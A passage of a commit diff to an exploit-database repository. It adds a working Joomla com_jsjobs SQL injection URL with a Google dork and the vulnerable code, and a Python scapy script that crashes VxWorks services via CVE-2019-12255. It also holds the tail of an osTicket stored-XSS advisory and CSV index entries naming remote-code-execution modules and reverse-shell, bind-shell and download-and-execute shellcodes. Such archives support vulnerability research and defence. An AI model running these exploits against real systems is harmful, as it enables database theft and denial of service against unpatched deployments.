application. The insertion of malicious queries in those fields leads to
the execution of those queries. This can further lead to cookie stealing or
other malicious actions.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14750
2. Proof of Concept
Steps to Reproduce:
- While setting up the osTicket application in the setup/install.php page
insert the XSS payload into the first name and last name field.
- After filling in all the other details and clicking on 'continue', it is
observed that there is no validation for the first name and last name field
and the malicious payload is stored and a new agent is created.
- Login as that agent and navigate to "agents" tab where we will find the
inserted payload in the firstname and Lastname field.
- Click on the firstname value and see the payload gets executed
3. Reference
https://github.com/osTicket/osTicket/commit/c3ba5b78261e07a883ad8fac28c214486c854e12
https://github.com/osTicket/osTicket/releases/tag/v1.12.1
https://github.com/osTicket/osTicket/releases/tag/v1.10.7
4. Solution
The vulnerability has been patched by the vendor in the next release which
is osTicket v1.10.7.

40
exploits/php/webapps/47232.txt Normal file
View file

@ -0,0 +1,40 @@
#Exploit Title: Joomla! component com_jsjobs - SQL Injection
#Dork: inurl:"index.php?option=com_jsjobs"
#Date: 11.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://www.joomsky.com/
#Software Link: https://www.joomsky.com/5/download/1
#Version: 1.2.5
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 296 in file site/models/cities.php
291 function isCityExist($countryid, $stateid, $cityname){
292 if (!is_numeric($countryid))
293 return false;
294
295 $db = $this->getDBO();
296 $query = "SELECT id,name,latitude,longitude FROM `#__js_job_cities` WHERE countryid=" . $countryid . " AND LOWER(name) = '" . strtolower($cityname) . "'"; //!!!
297
298 if($stateid > 0){
299 $query .= " AND stateid=".$stateid;
300 }else{
301 $query .= " AND (stateid=0 OR stateid IS NULL)";
302 }
303
305 $db->setQuery($query);
306 $city = $db->loadObject();
307 if ($city != null)
308 return $city;
309 else
310 return false;
311 }
312
313 }
#####################################
#PoC:
#####################################
http://localhost/index.php?option=com_jsjobs&task=cities.savecity&citydata=%27%20UNION%20SELECT%20*%20FROM%20(SELECT%20user())%20AS%20a%20JOIN%20(SELECT%20version())%20as%20b%20JOIN%20(SELECT%20database())%20as%20c%20JOIN%20(SELECT%20%27woot%27)%20as%20d--%20,Canada

28
exploits/vxworks/dos/47233.py Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability
# Discovered By: Armis Security
# PoC Author: Zhou Yu (twitter: @504137480)
# Vendor Homepage: https://www.windriver.com
# Tested on: VxWorks 6.8
# CVE: CVE-2019-12255
# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255
# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
from scapy.all import *
if __name__ == "__main__":
ip = "192.168.10.199"
dport = 23
seq_num = 1000
payload = "\x42"*2000
sport = random.randint(1024,65535)
syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
syn_ack = sr1(syn)
seq_num = seq_num + 1
ack_num = syn_ack.seq+1
ack = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "A", seq=seq_num, ack=ack_num)
send(ack)
psh = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "PAU", seq=seq_num, ack=ack_num, urgptr=0) / payload
send(psh)

17
files_exploits.csv
View file

@ -6522,6 +6522,9 @@ id,file,description,date,author,type,platform,port
47194,exploits/multiple/dos/47194.txt,"iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects",2019-07-30,"Google Security Research",dos,multiple,
47207,exploits/macos/dos/47207.txt,"macOS iMessage - Heap Overflow when Deserializing",2019-08-05,"Google Security Research",dos,macos,
47211,exploits/multiple/dos/47211.html,"Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability",2019-08-07,"Google Security Research",dos,multiple,
47233,exploits/vxworks/dos/47233.py,"VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow",2019-08-12,"Zhou Yu",dos,vxworks,
47236,exploits/linux/dos/47236.c,"Linux - Use-After-Free Reads in show_numa_stats()",2019-08-12,"Google Security Research",dos,linux,
47237,exploits/multiple/dos/47237.txt,"WebKit - UXSS via XSLT and Nested Document Replacements",2019-08-12,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10627,6 +10630,7 @@ id,file,description,date,author,type,platform,port
47173,exploits/multiple/local/47173.sh,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)",2019-01-13,bcoles,local,multiple,
47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple,
47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17595,6 +17599,10 @@ id,file,description,date,author,type,platform,port
47208,exploits/windows/remote/47208.rb,"Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)",2019-08-05,Metasploit,remote,windows,
47209,exploits/multiple/remote/47209.py,"ARMBot Botnet - Arbitrary Code Execution",2019-08-05,prsecurity,remote,multiple,
47215,exploits/php/remote/47215.rb,"Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)",2019-08-08,"Ege Balci",remote,php,80
47227,exploits/multiple/remote/47227.rb,"ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
47228,exploits/multiple/remote/47228.rb,"ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
47229,exploits/multiple/remote/47229.rb,"ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41586,3 +41594,12 @@ id,file,description,date,author,type,platform,port
47216,exploits/php/webapps/47216.txt,"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download",2019-08-08,qw3rTyTy,webapps,php,80
47217,exploits/php/webapps/47217.txt,"Adive Framework 2.0.7 - Cross-Site Request Forgery",2019-08-08,"Pablo Santiago",webapps,php,80
47218,exploits/php/webapps/47218.txt,"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection",2019-08-08,qw3rTyTy,webapps,php,80
47219,exploits/php/webapps/47219.txt,"BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting",2019-08-12,"Angelo Ruwantha",webapps,php,80
47220,exploits/hardware/webapps/47220.rb,"Cisco Adaptive Security Appliance - Path Traversal (Metasploit)",2019-08-12,"Angelo Ruwantha",webapps,hardware,443
47221,exploits/php/webapps/47221.txt,"UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting",2019-08-12,Greg.Priest,webapps,php,80
47222,exploits/php/webapps/47222.txt,"Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection",2019-08-12,qw3rTyTy,webapps,php,80
47223,exploits/php/webapps/47223.txt,"Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion",2019-08-12,qw3rTyTy,webapps,php,80
47224,exploits/php/webapps/47224.txt,"osTicket 1.12 - Persistent Cross-Site Scripting via File Upload",2019-08-12,"Aishwarya Iyer",webapps,php,80
47225,exploits/php/webapps/47225.txt,"osTicket 1.12 - Formula Injection",2019-08-12,"Aishwarya Iyer",webapps,php,80
47226,exploits/php/webapps/47226.txt,"osTicket 1.12 - Persistent Cross-Site Scripting",2019-08-12,"Aishwarya Iyer",webapps,php,80
47232,exploits/php/webapps/47232.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection",2019-08-12,qw3rTyTy,webapps,php,80

Can't render this file because it is too large.

14
files_shellcodes.csv
View file

@ -533,19 +533,19 @@ id,file,description,date,author,type,platform
38815,shellcodes/linux_x86-64/38815.c,"Linux/x64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
39149,shellcodes/linux_x86-64/39149.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
39152,shellcodes/linux_x86-64/39152.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
39152,shellcodes/linux_x86-64/39152.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,Sathishshan,shellcode,linux_x86-64
39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39185,shellcodes/linux_x86-64/39185.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
39203,shellcodes/linux_x86-64/39203.c,"Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
39185,shellcodes/linux_x86-64/39185.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,Sathishshan,shellcode,linux_x86-64
39203,shellcodes/linux_x86-64/39203.c,"Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,Sathishshan,shellcode,linux_x86-64
39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39312,shellcodes/linux_x86-64/39312.c,"Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
39312,shellcodes/linux_x86-64/39312.c,"Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,Sathishshan,shellcode,linux_x86-64
39336,shellcodes/linux/39336.c,"Linux x86/x64 - Reverse (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
39337,shellcodes/linux/39337.c,"Linux x86/x64 - Bind (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
39338,shellcodes/linux/39338.c,"Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
39383,shellcodes/linux_x86-64/39383.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
39388,shellcodes/linux_x86-64/39388.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39383,shellcodes/linux_x86-64/39383.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,Sathishshan,shellcode,linux_x86-64
39388,shellcodes/linux_x86-64/39388.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,Sathishshan,shellcode,linux_x86-64
39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
39390,shellcodes/linux_x86-64/39390.c,"Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39390,shellcodes/linux_x86-64/39390.c,"Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,Sathishshan,shellcode,linux_x86-64
39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
39578,shellcodes/linux_x86-64/39578.c,"Linux/x64 - Reverse (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64

1 id file description date author type platform
533 38815 shellcodes/linux_x86-64/38815.c Linux/x64 - execve() + Polymorphic Shellcode (31 bytes) 2015-11-25 d4sh&r shellcode linux_x86-64
534 38959 shellcodes/generator/38959.py Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator) 2015-12-13 B3mB4m shellcode generator
535 39149 shellcodes/linux_x86-64/39149.c Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) 2016-01-01 Scorpion_ shellcode linux_x86-64
536 39152 shellcodes/linux_x86-64/39152.c Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) 2016-01-02 Sathish kumar Sathishshan shellcode linux_x86-64
537 39160 shellcodes/linux_x86/39160.c Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1) 2016-01-04 Dennis 'dhn' Herrmann shellcode linux_x86
538 39185 shellcodes/linux_x86-64/39185.c Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) 2016-01-06 Sathish kumar Sathishshan shellcode linux_x86-64
539 39203 shellcodes/linux_x86-64/39203.c Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes) 2016-01-08 Sathish kumar Sathishshan shellcode linux_x86-64
540 39204 shellcodes/linux_x86/39204.c Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes) 2016-01-08 Dennis 'dhn' Herrmann shellcode linux_x86
541 39312 shellcodes/linux_x86-64/39312.c Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes) 2016-01-25 Sathish kumar Sathishshan shellcode linux_x86-64
542 39336 shellcodes/linux/39336.c Linux x86/x64 - Reverse (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes) 2016-01-27 B3mB4m shellcode linux
543 39337 shellcodes/linux/39337.c Linux x86/x64 - Bind (4444/TCP) Shell Shellcode (251 bytes) 2016-01-27 B3mB4m shellcode linux
544 39338 shellcodes/linux/39338.c Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes) 2016-01-27 B3mB4m shellcode linux
545 39383 shellcodes/linux_x86-64/39383.c Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) 2016-01-29 Sathish kumar Sathishshan shellcode linux_x86-64
546 39388 shellcodes/linux_x86-64/39388.c Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) 2016-02-01 Sathish kumar Sathishshan shellcode linux_x86-64
547 39389 shellcodes/linux_x86/39389.c Linux/x86 - Download File + Execute Shellcode (135 bytes) 2016-02-01 B3mB4m shellcode linux_x86
548 39390 shellcodes/linux_x86-64/39390.c Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes) 2016-02-01 Sathish kumar Sathishshan shellcode linux_x86-64
549 39496 shellcodes/arm/39496.c Linux/ARM - Reverse (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes) 2016-02-26 Xeon shellcode arm
550 39519 shellcodes/windows_x86/39519.c Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) 2016-03-02 Sean Dillon shellcode windows_x86
551 39578 shellcodes/linux_x86-64/39578.c Linux/x64 - Reverse (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes) 2016-03-21 Sudhanshu Chauhan shellcode linux_x86-64